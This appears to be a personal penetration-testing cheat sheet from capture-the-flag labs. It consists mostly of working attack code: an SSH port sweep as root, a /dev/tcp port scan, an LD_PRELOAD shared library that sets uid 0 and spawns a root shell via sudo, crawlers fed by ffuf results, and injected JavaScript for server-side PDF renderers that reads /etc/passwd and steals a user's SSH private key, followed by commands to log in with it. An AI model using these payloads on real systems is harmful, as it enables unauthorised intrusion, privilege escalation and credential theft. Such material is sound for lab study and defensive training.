#### Script to test various SSH ports

#!/bin/bash

# Try an SSH connection on every port in the range and stop at the first success.
# StrictHostKeyChecking=no avoids hanging on host-key prompts for unknown ports.
for port in {9000..13999}; do
  if ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -p "$port" root@10.10.115.189 exit 2>/dev/null; then
    echo "SSH connection successful on port $port"
    exit 0
  fi
done

echo "No open SSH port found"
exit 1
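
A faster variant that only checks whether each port accepts a TCP connection (no SSH handshake or authentication), using bash's built-in /dev/tcp — a minimal sketch against the same target:

#!/bin/bash

for port in {9000..13999}; do
  # /dev/tcp/<host>/<port> opens a TCP connection; exit 0 means the port is open
  if timeout 1 bash -c "echo > /dev/tcp/10.10.115.189/$port" 2>/dev/null; then
    echo "Port $port is open"
  fi
done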


#### LD_PRELOAD

shell.c:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

// Runs on library load (no libc startup files, hence -nostartfiles).
// Clear LD_PRELOAD so child processes don't re-inject the library,
// escalate to root, then spawn a shell.
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

- gcc -fPIC -shared -o shell.so shell.c -nostartfiles
- if you get implicit-declaration errors for setgid/setuid, make sure #include <unistd.h> is present
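
To use it, preload the compiled library into a program you can run with elevated privileges. A typical invocation — assuming sudo -l shows env_keep+=LD_PRELOAD and that find is among the permitted binaries (both are assumptions; adjust to the target):

# /tmp/shell.so is a placeholder path for the library compiled above
sudo LD_PRELOAD=/tmp/shell.so find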


#### Script to scrape links from the URLs in results.txt

import requests
from bs4 import BeautifulSoup

def scrape_links(url):
    # Send a GET request to the page
    response = requests.get(url)
    # Parse the HTML content
    soup = BeautifulSoup(response.text, 'html.parser')
    # Find all <a> tags
    links = soup.find_all('a')
    return links

def main():
    # Open the results file (one URL per line)
    with open("results.txt", "r") as file:
        for line in file:
            links = scrape_links(line.strip())
            # Print each link's href attribute
            for link in links:
                print(link.get('href'))

if __name__ == "__main__":
    main()
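
Hypothetical usage — assuming the script is saved as scrape_links.py (a placeholder name) and results.txt holds one URL per line:

echo "http://10.10.115.189/" > results.txt
echo "http://10.10.115.189/admin/" >> results.txt
python3 scrape_links.py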


#### Same as above but from HTB:

#!/usr/bin/env python3
import json
import requests
import argparse
from bs4 import BeautifulSoup

def results(file):
    # ffuf's JSON output is a single object with a "results" list
    with open(file, 'r') as f:
        data = json.load(f)
    urls = []
    for url in data['results']:
        urls.append(url['url'])
    return urls

def crawl(url):
    r = requests.get(url)
    soup = BeautifulSoup(r.text, 'lxml')
    links = soup.find_all('a', href=True)
    for link in links:
        link = link['href']
        if link and link != '#':
            print('[+] {} : {}'.format(url, link))

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("file", help="ffuf results")
    args = parser.parse_args()
    urls = results(args.file)
    for url in urls:
        crawl(url)
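
Hypothetical end-to-end usage — assuming the script is saved as crawl.py (a placeholder name); ffuf's JSON output format produces the "results" list the script expects (the wordlist path is also a placeholder):

ffuf -u http://10.10.115.189/FUZZ -w /usr/share/wordlists/dirb/common.txt -o results.json -of json
python3 crawl.py results.json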


#### Script to read a local file via XMLHttpRequest

Use this script when you can inject markup into something that gets rendered and exported server-side (for example an HTML-to-PDF export): the renderer executes the JavaScript, reads the local file, and writes its contents into the exported output.

<script>
var x = new XMLHttpRequest();
// Read a local file via the file:// scheme (works when the renderer allows local file access)
x.open("GET", "file:///etc/passwd", true);
x.onload = function(){
    document.write(x.responseText);
};
x.send();
</script>


##### As above, but to get the base64-encoded SSH key

<script>
var x = new XMLHttpRequest();
x.open("GET", "file:///home/reader/.ssh/id_rsa", true);
x.onload = function(){
    // base64-encode the key so its line breaks survive the export intact
    var code = "<textarea rows='100' cols='70'>" + btoa(x.responseText) + "</textarea>";
    document.write(code);
};
x.send();
</script>
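
Once the base64 blob is copied out of the exported document, decode and use it locally — assuming the key belongs to the reader user seen in the path above (key.b64 is a placeholder filename):

base64 -d key.b64 > id_rsa
chmod 600 id_rsa
ssh -i id_rsa reader@10.10.115.189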